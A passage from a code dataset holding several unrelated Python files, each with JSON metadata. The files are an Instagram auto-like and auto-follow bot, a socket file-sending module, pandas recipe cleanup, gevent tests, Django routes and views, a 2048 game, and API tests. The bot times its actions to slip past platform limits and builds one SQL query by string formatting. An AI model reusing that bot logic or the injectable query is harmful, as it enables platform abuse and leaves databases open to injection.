profile_get_followers, attempt_get_followed_back) \n VALUES \n (%s, %s, %s, 0)\"\"\", (followed_name, timenow, Setup.hashtag))\n\n conn.close()\n\n Setup.follow += 1\n\n except:\n print('Impossible following because you already follow this user')\n sleep(randint(2, 5))\n browser.find_element_by_xpath('//a[text()=\"Next\"]').click()\n print(\"skip to next one\")\n\n\n\n elif Setup.follow >= Setup.follow_limit:\n print(\"You exceeded the follow limit : (\", Setup.follow_limit, \") for this session\")\n\n\n except: #Exception as e:\n sleep(1)\n\n #print(\"type error: \" + str(e))\n\n\n\n\ndef skip_next_picture(browser):\n browser.find_element_by_xpath('//a[text()=\"Next\"]').click()\n # print(\"skip\")\n sleep(randint(2, 5))\n\n\ndef actions(browser, conn):\n followed = 0\n try:\n browser.get('https://www.google.com')\n except Exception as e:\n print(\"type error: \" + str(e))\n print('No such session! 
starting webDivers!')\n Main.start_browser()\n\n try:\n time_check_ban = time.time()\n if (time_check_ban - time_start_ban_like) >= 7200:\n Get_followers_from_people.like_blocked = False\n if (time_check_ban - time_start_ban_follow) >= 7200:\n Get_followers_from_people.follow_blocked = False\n print('Liking and Following')\n for _ in range(randint(17, 23)):\n\n if Setup.like <= Setup.like_limit:\n get_hashtag_page(browser)\n check_ban_like(browser)\n\n if Setup.follow <= Setup.follow_limit:\n get_hashtag_page(browser)\n check_ban_follow(browser, Setup.conn)\n followed += 1\n\n get_hashtag_page(browser)\n\n for operations in range(5):\n if Get_followers_from_people.like_blocked == True and Get_followers_from_people.follow_blocked == True:\n break\n choose_to_follow = 0\n if Get_followers_from_people.like_blocked == False and Setup.like <= Setup.like_limit:\n like(browser)\n choose_to_follow = randint(1, 2)\n if choose_to_follow == 1 and Get_followers_from_people.follow_blocked == False and Setup.follow <= Setup.follow_limit:\n follow(browser)\n followed += 1\n skip_next_picture(browser)\n for _ in range(1, 4):\n skip_next_picture(browser)\n if Get_followers_from_people.follow_blocked == False and Setup.follow <= Setup.follow_limit:\n follow(browser)\n for _ in range(1, 4):\n skip_next_picture(browser)\n\n except: #Exception as e:\n\n #print(\"type error: \" + str(e))\n\n #print(traceback.format_exc())\n sleep(1)\n\n update_data_db(followed)\n print(\"Tot Post Liked: \", Setup.like)\n print(\"Tot Followed users: \", Setup.follow)\n\n\ndef check_follow_admin(browser):\n try:\n WebDriverWait(browser, 5).until(EC.element_to_be_clickable((By.XPATH, '//span/button[text()=\"Follow\"]')))\n browser.find_element_by_xpath('//span/button[text()=\"Follow\"]').click()\n print(\"Following the admin\")\n except:\n sleep(1)\n\n\ndef follow_admins(browser):\n browser.get(\"https://www.instagram.com/saminabayat\")\n check_follow_admin(browser)\n browser.get(\"https://www.instagram.com/cocoolinaa\")\n check_follow_admin(browser)\n browser.get(\"https://www.instagram.com/nancy_ismaiil\")\n check_follow_admin(browser)\n browser.get(\"https://www.instagram.com/currentlylizzie\")\n check_follow_admin(browser)\n\n\n\ndef update_data_db(followed):\n try:\n\n conn = MySQLdb.connect(host=Setup.host, port=Setup.port, user=Setup.user, passwd=Setup.password, db=Setup.db)\n a = conn.cursor()\n a.execute(\"\"\" \n SELECT follow_done \n FROM DATA_PEOPLE_GET_FOLLOWERS \n WHERE date_count = CURDATE() AND name = '%s' \"\"\" % Setup.hashtag)\n follow_done = a.fetchone()\n rows = a.rowcount\n conn.commit()\n conn.close()\n if rows == 1:\n print(\"update mysql\")\n follow_done = follow_done[0] + followed\n conn = MySQLdb.connect(host=Setup.host, port=Setup.port, user=Setup.user, passwd=Setup.password, db=Setup.db)\n a = conn.cursor()\n a.execute(\"\"\"\n UPDATE DATA_PEOPLE_GET_FOLLOWERS\n SET follow_done = %s \n WHERE name = %s and date_count = CURDATE()\n \"\"\", (follow_done, Setup.hashtag))\n conn.commit()\n conn.close()\n else:\n print(\"create mysql\")\n conn = MySQLdb.connect(host=Setup.host, port=Setup.port, user=Setup.user, passwd=Setup.password, db=Setup.db)\n a = conn.cursor()\n a.execute(\"\"\"\n INSERT INTO DATA_PEOPLE_GET_FOLLOWERS \n (name, date_count, followers_got, follow_done) \n VALUES \n (%s, CURDATE(), 0, %s)\"\"\", (Setup.hashtag, followed))\n conn.commit()\n conn.close()\n except Exception as e:\n print(\"type error: \" + str(e))\n 
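        # traceback.format_exc() renders the full stack trace of the exception
        # currently being handled, so the log shows which MySQL statement
        # failed rather than only str(e).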
print(traceback.format_exc())","sub_path":"Like_follow.py","file_name":"Like_follow.py","file_ext":"py","file_size_in_byte":11744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"326581831","text":"import socket\nimport os \n\n#Script to make download from a server\n\ndef down(filename, s, host,port):\n\tarquivo = filename.decode(\"utf-8\")\n\tif os.path.isfile(filename):\n\t\ts.send(str.encode(\"EXISTS\" + str((os.path.getsize(filename)))))\n\t\ttamanho = os.path.getsize(filename)\n\t\ttamanho = int(tamanho)\n\t\tuserResponse = s.recv(1024)\n\t\tif userResponse[:2].decode(\"utf-8\") == 'OK':\n\t\t\twith open(arquivo, 'rb') as f:\n\t\t\t\tbytesToSend = f.read()\n\t\t\t\ts.send(bytesToSend)\n\t\t\t\tf.close()\n\telse:\n\t\ts.send(str.encode(\"ERROR\"))\n\n","sub_path":"linux/modules/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"327613630","text":"import pandas as pd\n\nimport sqlalchemy\nfrom sqlalchemy import MetaData, event\n\nconn = sqlalchemy.create_engine('mysql+pymysql://root@localhost/alchemy?charset=utf8')\n\nmeta = MetaData()\nmeta.reflect(bind=conn)\n\nAllIngredients = meta.tables['all_ingredients']\n\nimport numpy as np\n\ndef add_own_encoders(conn, cursor, query, *args):\n cursor.connection.encoders[np.int64] = lambda value, encoders: int(value)\n cursor.connection.encoders[np.float64] = lambda value, encoders: float(value)\n cursor.connection.encoders[pd.Timestamp] = lambda value, encoders: encoders[str](str(value.to_pydatetime()))\n cursor.connection.encoders[pd.Timedelta] = lambda value, encoders: value.total_seconds()\n\nevent.listen(conn, \"before_cursor_execute\", add_own_encoders)\n\n\npd.set_option('display.max_rows', 50)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 2000)\n\ndf_receipts = pd.read_sql(\"SELECT * FROM receipts;\", conn, index_col='id')\ndf_ingredients = pd.read_sql(\"SELECT * FROM ingredients;\", conn)\n\ndf_ingredients = pd.concat([pd.read_pickle('receipt/df_ingredients_part_{}.pkl'.format(i)) for i in [0,1,2]])\ndf_receipts = pd.concat([pd.read_pickle('receipt/df_receipts_part_{}.pkl'.format(i)) for i in [0,1,2,3,4,5]])\n\n# for i, part in enumerate(np.array_split(df_receipts, 6)):\n# part.to_pickle('receipt/df_receipts_part_{}.pkl'.format(i))\n# for i, part in enumerate(np.array_split(df_ingredients, 3)):\n# part.to_pickle('receipt/df_ingredients_part_{}.pkl'.format(i))\n\ndf = df_ingredients.join(df_receipts, on='receipt_id', lsuffix='_ing').set_index('id')\ndf.type.unique()\n# df[df.type == 'ivona'].name_ing.unique()\n#\n# df[df.type == 'ivona'].groupby('name_ing').name_ing.count().sort_values()\n#\n# others = df[df.type != 'ivona'].name_ing.apply(lambda x: x.split(' – ')[0]).apply(lambda x: x.split('—')[0])\ndf.loc[df.type != 'ivona', 'name_ing'] = df[df.type != 'ivona'].name_ing.apply(lambda x: x.split(' – ')[0]).apply(lambda x: x.split('—')[0])\n\ndf.name_ing = df.name_ing.apply(lambda x: x.lower())\n\nuniq_ings = df.groupby('name_ing').name_ing.count().sort_values()\n\n\n#uniq_ings['df_id'] = uniq_ings[:10].name.apply(lambda name: df[df.name_ing == name].index.value)\n# uniq_ings['df_id'] = uniq_ings.name.apply(lambda name: df[df.name_ing == name].index.values[0])\ndf['ing_id'] = df.name_ing.apply(lambda name: uniq_ings[uniq_ings.name == name].index.values[0])\n\n# for i, part in enumerate(np.array_split(df, 6)):\n# 
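# (np.array_split tolerates uneven chunk sizes, so the shards written here can
# be reassembled exactly with the pd.concat([pd.read_pickle(...) ...]) pattern
# used near the top of this script.)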
part.to_pickle('receipt/df_part_{}.pkl'.format(i))\n#\n# uniq_ings.to_pickle('receipt/df_uniq_ings.pkl')\n\nuniq_ings = uniq_ings.to_frame('count').reset_index().rename(columns={'name_ing':'name'})\nuniq_ings.index.name = 'id'\n\n# df = df[:10000]\n#\n# i = 0\n# def trr(x):\n# global i\n# v = uniq_ings[uniq_ings.name == x].index\n# print(i, x, v)\n# i += 1\n# return v\n#\n# df['ing_index'] = df.name_ing.apply(trr)\n\n\n\n\n\n\n# uu = df.join(uniq_ings, on='name')\n\nuniq_ings['ing'] = ''\nuniq_ings.loc[uniq_ings.name.str.contains(\"лук\"), 'ing'] = 'лук'\nuniq_ings.loc[uniq_ings.name.str.contains(\"яйц\"), 'ing'] = 'яйцо'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"кунжут\")) & (uniq_ings.name.str.contains(\"масл\")), 'ing'] = 'кунжутное масло'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"оливков\")) & (uniq_ings.name.str.contains(\"масл\")), 'ing'] = 'оливковое масло'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"растит\")) & (uniq_ings.name.str.contains(\"масл\")), 'ing'] = 'растительное масло'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"сливоч\")) & (uniq_ings.name.str.contains(\"масл\")), 'ing'] = 'сливочное масло'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"подсолн\")) & (uniq_ings.name.str.contains(\"масл\")), 'ing'] = 'подсолнечное масло'\nuniq_ings.loc[uniq_ings.name.str.contains(\"молок\"), 'ing'] = 'молоко'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"сгущен\")) & (uniq_ings.name.str.contains(\"молок\")), 'ing'] = 'cгущённое молоко'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"сгущён\")) & (uniq_ings.name.str.contains(\"молок\")), 'ing'] = 'cгущённое молоко'\nuniq_ings.loc[uniq_ings.name.str.contains(\"сметан\"), 'ing'] = 'сметана'\nuniq_ings.loc[uniq_ings.name.str.contains(\"сахар\"), 'ing'] = 'сахар'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"ваниль\")) & (uniq_ings.name.str.contains(\"сахар\")), 'ing'] = 'ванильный сахар'\nuniq_ings.loc[uniq_ings.name.str.contains(\"картоф\"), 'ing'] = 'картофель'\nuniq_ings.loc[uniq_ings.name.str.contains(\"морковь\"), 'ing'] = 'морковь'\nuniq_ings.loc[uniq_ings.name.str.contains(\"мука\"), 'ing'] = 'мука'\nuniq_ings.loc[uniq_ings.name.str.contains(\"лимон\"), 'ing'] = 'лимон'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"сок\")) & (uniq_ings.name.str.contains(\"лимон\")), 'ing'] = 'лимонный сок'\n\nuniq_ings[uniq_ings.name.str.contains(\"рис\")]\n# uniq_ings[uniq_ings.name.str.contains(\"майонез\")]\n\nuniq_ings.to_sql('unique_ingredients', con=conn, if_exists='append')\n","sub_path":"receipt/lab_prepare_all_ingridients.py","file_name":"lab_prepare_all_ingridients.py","file_ext":"py","file_size_in_byte":5173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"319954112","text":"# Copyright (c) 2009 AG Projects\n# Author: Denis Bilenko\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# 
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport greentest\nimport time\nimport re\nimport gevent\nfrom gevent import socket\nfrom gevent.hub import Waiter, get_hub\n\nDELAY = 0.1\n\n\nclass TestCloseSocketWhilePolling(greentest.TestCase):\n\n def test(self):\n try:\n sock = socket.socket()\n get_hub().loop.timer(0, sock.close)\n sock.connect(('python.org', 81))\n except Exception:\n gevent.sleep(0)\n else:\n assert False, 'expected an error here'\n\n\nclass TestExceptionInMainloop(greentest.TestCase):\n\n def test_sleep(self):\n # even if there was an error in the mainloop, the hub should continue to work\n start = time.time()\n gevent.sleep(DELAY)\n delay = time.time() - start\n\n assert delay >= DELAY * 0.9, 'sleep returned after %s seconds (was scheduled for %s)' % (delay, DELAY)\n\n error = greentest.ExpectedException('TestExceptionInMainloop.test_sleep/fail')\n\n def fail():\n raise error\n\n t = get_hub().loop.timer(0.001)\n t.start(fail)\n\n self.expect_one_error()\n\n start = time.time()\n gevent.sleep(DELAY)\n delay = time.time() - start\n\n self.assert_error(value=error)\n\n assert delay >= DELAY * 0.9, 'sleep returned after %s seconds (was scheduled for %s)' % (delay, DELAY)\n\n\nclass TestSleep(greentest.GenericWaitTestCase):\n\n def wait(self, timeout):\n gevent.sleep(timeout)\n\n def test_simple(self):\n gevent.sleep(0)\n\n\nclass TestWaiterGet(greentest.GenericWaitTestCase):\n\n def setUp(self):\n super(TestWaiterGet, self).setUp()\n self.waiter = Waiter()\n\n def wait(self, timeout):\n evt = get_hub().loop.timer(timeout)\n evt.start(self.waiter.switch)\n try:\n return self.waiter.get()\n finally:\n evt.stop()\n\n\nclass TestWaiter(greentest.TestCase):\n\n def test(self):\n waiter = Waiter()\n self.assertEqual(str(waiter), '')\n waiter.switch(25)\n self.assertEqual(str(waiter), '')\n self.assertEqual(waiter.get(), 25)\n\n waiter = Waiter()\n waiter.throw(ZeroDivisionError)\n assert re.match('^\\d+)/$\", ForumView.as_view(), name= \"forum\"),\n url(r\"^topic/(?P\\d+)/$\", TopicView.as_view(), name= \"topic\"),\n url(r\"^new_topic/(?P\\d+)/$\" , LR(NewTopic.as_view()), name= \"new_topic\"),\n url(r\"^reply/(?P\\d+)/$\" , LR(Reply.as_view()), name=\"reply\"),\n url(r\"^profile/(?P\\d+)/$\" , LR(EditProfile.as_view()), name=\"profile\"),\n url(r\"^viewprofile/(?P\\d+)/$\" , LR(UserPageView.as_view()), name=\"viewprofile\"),\n url(r\"^new_wallpost/(?P\\d+)/$\" , LR(NewWallpost.as_view()), name= \"new_wallpost\"),\n url(r\"^(?P\\d+)/like/$\", LR(like), name='like'),\n url(r\"^(?P\\d+)/friendlist/$\", LR(friendsList), name=\"friendlist\"),\n url(r\"^(?P\\d+)/addfriend/$\", LR(friendAdd),name=\"addfriend\"),\n url(r\"^(?P\\d+)/removefriend/$\", LR(friendRemove),name=\"removefriend\"),\n url(r\"^$\", Main.as_view(), name=\"main\"),\n)\n","sub_path":"forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"527507012","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author: bigfoolliu\n\n\n\"\"\"\n基于python和tkinter做的一个2048小游戏\n\"\"\"\n\nimport random\nimport numpy as np\nfrom tkinter import Frame, Label, CENTER\nimport datetime\n\nWIDTH = 400\nHEIGHT = 400\nLABEL_WIDTH = 
5\nLABEL_HEIGHT = 2\nBACKGROUND_COLOR_GAME = \"#92877d\"\nBACKGROUND_COLOR_CELL_EMPTY = \"#9e948a\"\n\nGRID_LEN = 4\nGRID_PADDING = 10\n\nBACKGROUND_COLOR_DICT = {\n 2: \"#eee4da\", 4: \"#ede0c8\", 8: \"#f2b179\", 16: \"#f59563\",\n 32: \"#f67c5f\", 64: \"#f65e3b\", 128: \"#edcf72\", 256: \"#edcc61\",\n 512: \"#edc850\", 1024: \"#edc53f\", 2048: \"#edc22e\", 4096: \"#eee4da\",\n 8192: \"#edc22e\", 16384: \"#f2b179\", 32768: \"#f59563\", 65536: \"#f67c5f\"\n}\n\nCELL_COLOR_DICT = {\n 2: \"#776e65\", 4: \"#776e65\", 8: \"#f9f6f2\", 16: \"#f9f6f2\",\n 32: \"#f9f6f2\", 64: \"#f9f6f2\", 128: \"#f9f6f2\", 256: \"#f9f6f2\",\n 512: \"#f9f6f2\", 1024: \"#f9f6f2\", 2048: \"#f9f6f2\", 4096: \"#776e65\",\n 8192: \"#f9f6f2\", 16384: \"776e65\", 32768: \"#776e65\", 65536: \"#f9f6f2\"\n}\n\nFONT = (\"Verdana\", 40, \"bold\")\n\nKEY_UP_ALT = \"\\'\\\\uf700\\'\"\nKEY_DOWN_ALT = \"\\'\\\\uf701\\'\"\nKEY_LEFT_ALT = \"\\'\\\\uf702\\'\"\nKEY_RIGHT_ALT = \"\\'\\\\uf703\\'\"\n\nKEY_UP = \"'w'\"\nKEY_DOWN = \"'s'\"\nKEY_LEFT = \"'a'\"\nKEY_RIGHT = \"'d'\"\nKEY_BACK = \"'b'\"\n\n\ndef show_time():\n \"\"\"显示当前时间\"\"\"\n return datetime.datetime.now().isoformat()\n\n\ndef new_game(n):\n \"\"\"创建一个新的游戏\"\"\"\n print(\"[INFO]{}:Begin to create a new game.\".format(show_time()))\n matrix = []\n for i in range(n):\n matrix.append([0] * n)\n print(\"[INFO]{}:Create the game mat complete, the mat:{}\".format(show_time(), matrix))\n return matrix\n\n\ndef add_two(mat):\n \"\"\"在一个空的格子里产生一个2\"\"\"\n print(\"[INFO]{}:To generate a new 2 in empty cell.\".format(show_time()))\n a = random.randint(0, len(mat) - 1)\n b = random.randint(0, len(mat) - 1)\n while (mat[a][b] != 0):\n a = random.randint(0, len(mat) - 1)\n b = random.randint(0, len(mat) - 1)\n mat[a][b] = 2\n print(\"[INFO]{}:Generate 2 complete, the mat:{}\".format(show_time(), mat))\n return mat\n\n\ndef game_state(mat):\n \"\"\"当前游戏的状态\"\"\"\n print(\"[INFO]{}:To show the state of the game.\".format(show_time()))\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == 2048:\n return \"Win\"\n for i in range(len(mat) - 1):\n for j in range(len(mat[0]) - 1):\n if mat[i][j] == mat[i + 1][j] or mat[i][j + 1] == mat[i][j]:\n return \"Not over\"\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == 0:\n return \"Not over\"\n for k in range(len(mat) - 1):\n if mat[len(mat) - 1][k] == mat[len(mat) - 1][k + 1]:\n return \"Not over\"\n for j in range(len(mat) - 1):\n if mat[j][len(mat) - 1] == mat[j + 1][len(mat) - 1]:\n return \"Not over\"\n return \"Lose\"\n\n\ndef reverse(mat):\n \"\"\"将整个矩阵反转,[[1, 2], [3, 4]]--->[[2, 1], [4, 3]]\"\"\"\n print(\"[INFO]{}:To reverse the mat vertically.\".format(show_time()))\n tmp = np.array([[0, 0, 0, 1], [0, 0, 1, 0], [0, 1, 0, 0], [1, 0, 0, 0]])\n new = np.dot(mat, tmp).tolist()\n print(\"[INFO]{}:Reverse the mat complete.\".format(show_time()))\n return new\n\n\ndef transpose(mat):\n \"\"\"将整个矩阵转置,[[1, 2], [3, 4]]--->[[1, 3], [2, 4]]\"\"\"\n print(\"[INFO]{}:To reverse the mat horizontally.\".format(show_time()))\n new = np.array(mat).T.tolist() # 使用numpy将列表转换为矩阵求转置再转换为列表\n print(\"[INFO]{}:Transpose the mat complete.\".format(show_time()))\n return new\n\n\ndef cover_up(mat):\n \"\"\"朝左侧覆盖空格\"\"\"\n print(\"[INFO]{}:To cover up the frame.\".format(show_time()))\n new = [[0, 0, 0, 0] for i in range(4)]\n done = False\n for i in range(4):\n count = 0\n for j in range(4):\n if mat[i][j] != 0:\n new[i][count] = mat[i][j]\n if j != count:\n done = True\n count += 1\n print(\"[INFO]{}:Cover up 
the frame complete.\".format(show_time()))\n return (new, done)\n\n\ndef merge(mat):\n \"\"\"合并可翻倍的网格\"\"\"\n print(\"[INFO]{}:Begin to merge.\".format(show_time()))\n done = False\n for i in range(4):\n for j in range(3):\n if mat[i][j] == mat[i][j + 1] and mat[i][j] != 0:\n mat[i][j] *= 2\n mat[i][j + 1] = 0\n done = True\n print(\"[INFO]{}:Merge complete.\".format(show_time()))\n return (mat, done)\n\n\ndef up(game):\n print(\"[INFO]{}:Up pressed\".format(show_time()))\n game = transpose(game)\n game, done = cover_up(game)\n temp = merge(game)\n game = temp[0]\n done = done or temp[1]\n game = cover_up(game)[0]\n game = transpose(game)\n return (game, done)\n\n\ndef down(game):\n print(\"[INFO]{}:Down pressed\".format(show_time()))\n game = reverse(transpose(game))\n game, done = cover_up(game)\n temp = merge(game)\n game = temp[0]\n done = done or temp[1]\n game = cover_up(game)[0]\n game = transpose(reverse(game))\n return (game, done)\n\n\ndef left(game):\n print(\"[INFO]{}:Left pressed\".format(show_time()))\n game, done = cover_up(game)\n temp = merge(game)\n game = temp[0]\n done = done or temp[1]\n game = cover_up(game)[0]\n return (game, done)\n\n\ndef right(game):\n print(\"[INFO]{}:Right pressed\".format(show_time()))\n game = reverse(game)\n game, done = cover_up(game)\n temp = merge(game)\n game = temp[0]\n done = done or temp[1]\n game = cover_up(game)[0]\n game = reverse(game)\n return (game, done)\n\n\nclass GameGrid(Frame):\n \"\"\"游戏界面类\"\"\"\n\n def __init__(self):\n \"\"\"游戏界面初始化\"\"\"\n print(\"[INFO]{}:Initialize the frame.\".format(show_time()))\n Frame.__init__(self)\n\n self.grid()\n self.master.title(\"2048\")\n self.master.bind(\"\", self.key_down)\n\n self.commands = {\n KEY_UP: up,\n KEY_DOWN: down,\n KEY_LEFT: left,\n KEY_RIGHT: right,\n KEY_UP_ALT: up,\n KEY_DOWN_ALT: down,\n KEY_LEFT_ALT: left,\n KEY_RIGHT_ALT: right\n }\n self.grid_cells = []\n self.init_grid()\n self.init_matrix()\n self.update_grid_cells()\n self.mainloop()\n\n def init_grid(self):\n \"\"\"初始化网格\"\"\"\n print(\"[INFO]{}:Initialize the grid.\".format(show_time()))\n background = Frame(self, bg=BACKGROUND_COLOR_GAME, width=WIDTH, height=HEIGHT)\n background.grid()\n\n for i in range(GRID_LEN):\n grid_row = []\n for j in range(GRID_LEN):\n cell = Frame(background, bg=BACKGROUND_COLOR_CELL_EMPTY, width=WIDTH / GRID_LEN,\n height=HEIGHT / GRID_LEN)\n cell.grid(row=i, column=j, padx=GRID_PADDING, pady=GRID_PADDING)\n t = Label(master=cell, text=\"\", bg=BACKGROUND_COLOR_CELL_EMPTY, justify=CENTER, font=FONT,\n width=LABEL_WIDTH, height=LABEL_HEIGHT)\n t.grid()\n grid_row.append(t)\n\n self.grid_cells.append(grid_row)\n print(\"[INFO]{}:Initialize the grid complete.\".format(show_time()))\n\n def gen(self):\n \"\"\"随机生成数字\"\"\"\n return random.randint(0, GRID_LEN - 1)\n\n def init_matrix(self):\n \"\"\"初始化矩阵\"\"\"\n print(\"[INFO]{}:Initialize the matrix\".format(show_time()))\n self.matrix = new_game(4)\n self.history_matrix = list()\n self.matrix = add_two(self.matrix)\n self.matrix = add_two(self.matrix)\n print(\"[INFO]{}:Initialize the mattrix complete.\".format(show_time()))\n\n def update_grid_cells(self):\n \"\"\"更新网格\"\"\"\n print(\"[INFO]{}:Update the grid cells\".format(show_time()))\n for i in range(GRID_LEN):\n for j in range(GRID_LEN):\n new_number = self.matrix[i][j]\n if new_number == 0:\n self.grid_cells[i][j].configure(text=\"\", bg=BACKGROUND_COLOR_CELL_EMPTY)\n else:\n self.grid_cells[i][j].configure(text=str(new_number), bg=BACKGROUND_COLOR_DICT[new_number],\n 
fg=CELL_COLOR_DICT[new_number])\n self.update_idletasks()\n print(\"[INFO]{}:Update the gride cells complete.\".format(show_time()))\n\n def key_down(self, event):\n \"\"\"按下键盘\"\"\"\n print(\"[INFO]{}:Key pressed\".format(show_time()))\n key = repr(event.char)\n if key == KEY_BACK and len(self.history_matrix) > 1:\n self.matrix = self.history_matrix.pop()\n self.update_grid_cells()\n print(\"[INFO]{}:Back on step totall step:{}\".format(show_time(), len(self.history_matrix)))\n elif key in self.commands:\n self.matrix, done = self.commands[repr(event.char)](self.matrix)\n if done:\n self.matrix = add_two(self.matrix)\n self.history_matrix.append(self.matrix)\n self.update_grid_cells()\n done = False\n if game_state(self.matrix) == \"Win\":\n self.grid_cells[1][1].configure(text=\"You\", bg=BACKGROUND_COLOR_CELL_EMPTY)\n self.grid_cells[1][2].configure(text=\"Win\", bg=BACKGROUND_COLOR_CELL_EMPTY)\n if game_state(self.matrix) == \"Lose\":\n self.grid_cells[1][1].congigure(text=\"You\", bg=BACKGROUND_COLOR_CELL_EMPTY)\n self.grid_cells[1][2].configure(text=\"Lose\", bg=BACKGROUND_COLOR_CELL_EMPTY)\n\n def generate_text(self):\n \"\"\"生成文本\"\"\"\n index = (self.gen(), self.gen())\n while self.matrix[index[0]][index[1]] != 0:\n index = (self.gen(), self.gen())\n self.matrix[index[0]][index[1]] = 2\n\n\ngame_grid = GameGrid()\n","sub_path":"projects/games/2048_python/2048_game.py","file_name":"2048_game.py","file_ext":"py","file_size_in_byte":9895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"361104383","text":"# -*- coding: UTF-8 -*-\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\n\nfrom DeBar.classes import Text\n\nfrom DeBar.models import Mesa\n\n@permission_required(\"DeBar.mesas\", '/sistema/'+Text().permissao_ver_negada(\"Mesas\"))\ndef principal(request):\n\n return renderizar(request, 'cadastro/mesa.html', Variavel({'mesas': getAll(request, Mesa)}))\n\n############################################################################################################\n############################################################################################################\n\n@permission_required(\"DeBar.mesas\", '/sistema/'+Text().permissao_criar_negada(\"Mesas\"))\ndef salvar(request):\n\n#########################################################################################################\n# pega os valores da tela, monta o objeto e depois valida o erro para ver que #\n# tipo de aviso deve mostrar na tela para o usuário #\n#########################################################################################################\n\n inicial = request.POST.get('numeroinicial')\n final = request.POST.get('numerofinal')\n\n mesas = C_Mesa(request, Mesa(), inicial, final)\n\n if mesas.isvalido:\n mesas.save()\n\n if \"Os seguintes\" in mesas.mensagem:\n message.alerta(request, mesas.mensagem)\n elif \"Todo o intervalo\" in mesas.mensagem:\n message.mensagem(request, mesas.mensagem)\n elif \"Por favor, informe um\" in mesas.mensagem:\n message.erro(request, mesas.mensagem)\n else:\n message.erro(request, mesas.mensagem)\n\n\n return 
HttpResponseRedirect(reverse('MESA_PRINCIPAL'))\n\n############################################################################################################\n############################################################################################################\n\n@permission_required(\"DeBar.mesas\", '/sistema/'+Text().permissao_editar_negada(\"Mesas\"))\ndef ativar(request, id):\n\n#########################################################################################################\n# instancia a classe com o id informado e muda o status #\n#########################################################################################################\n\n mes = getOne(request, Mesa, id)\n mesa = C_Mesa(request, mes)\n\n mesa.ativar()\n\n if mesa.isvalido:\n mesa.save()\n else:\n message.erro(request, mesa.mensagem)\n\n return HttpResponseRedirect(reverse('MESA_PRINCIPAL'))","sub_path":"DeBar/views/mesa.py","file_name":"mesa.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390028908","text":"import unittest\nfrom utils.send_method import SendMethod\nfrom utils.utils import dumpJ\n\n\"\"\"\n 对每个接口进行功能测试\n 使用到的库 unittest\n\"\"\"\n\n\nclass DepartmentTest(unittest.TestCase):\n def setUp(self):\n self.url = \"http://127.0.0.1:8000/api/departments/\"\n self.send = SendMethod()\n\n def test_case_01(self):\n \"\"\"\n 完成查询所有��院接口的测试\n \"\"\"\n res = self.send.send_main(\"get\", url=self.url)\n count = res[\"count\"]\n self.assertNotEqual(count, 0, \"查询所有学院失败\")\n\n def test_case_02(self):\n \"\"\"\n 查询单独指定的一个学院\n \"\"\"\n # 定义参数\n data = {\n \"$dep_id_list\": \"T001\"\n }\n # 发送请求\n res = self.send.send_main(\"get\", url=self.url, data=data)\n # dumpJ(res)\n # 通过count进行断言\n count = res['count']\n self.assertEqual(count, 1, \"查询单个学院接口失败\")\n\n # 通过dep_id进行断言\n dep_id = res['results'][0]['dep_id']\n self.assertEqual(dep_id, \"T001\", \"查询单个学院失败\")\n\n def test_case_03(self):\n \"\"\"\n 更新院长的名字查询单个\n \"\"\"\n # 参数\n data = {\n \"$master_name_list\": \"老张\"\n }\n # 发送请求\n res = self.send.send_main(\"get\", url=self.url, data=data)\n\n # 通过count 断言\n count = res['count']\n self.assertEqual(count, 1, \"根据院长名字查询失败\")\n\n # 根据院长名字断言\n master_name = res['results'][0]['master_name']\n self.assertEqual(master_name, \"老张\", \"根据院长名字查询失败\")\n\n def test_case_04(self):\n \"\"\"\n 测试学院新增接口\n \"\"\"\n # 参数\n data = {\n \"data\": [\n {\n \"dep_id\": \"T01\",\n \"dep_name\": \"测试大学院\",\n \"master_name\": \"段教授\",\n \"slogan\": \"学以致用\"\n }\n ]\n }\n # 发送请求\n res = self.send.send_main(\"post\", url=self.url, json=data)\n # dumpJ(res)\n # 通过create_success中的count断言\n count = res['create_success']['count']\n self.assertEqual(count, 1, \"添加学院失败\")\n\n # 通过create_success中的dep_id断言\n dep_id = 